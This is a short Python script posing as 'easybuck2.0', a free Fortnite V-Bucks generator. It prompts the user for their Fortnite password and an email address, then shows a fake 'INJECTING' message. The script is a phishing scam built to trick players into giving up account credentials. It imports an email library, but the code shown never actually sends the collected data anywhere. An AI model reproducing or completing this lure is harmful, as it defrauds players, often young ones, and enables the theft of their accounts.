import smtplib
import time
print(" ")
print(" hello there!Howdy this is easybuck2.0 the best vbuck giver of all time!!")
print(" ")
print(" we  will give you the  amount of vbucks you desire!")
print(" ")
print(" May you fill in below")
print(" ")
print(" amount of vbucks:")
amountofvbucks = input()
print(" ")
print(" Password to fortnite to inject vbucks: ")
password = input()
print(" ")
print("email to notify when the vbucks are in your account:")
phone = input()
print(" ")
print("  INJECTING...: ")
hack = input()
print(" ")
print("  thankyou for using our well made software! we will notify you when where done ")
print(" ")
print("  DO NOT OPEN FORTNITE")
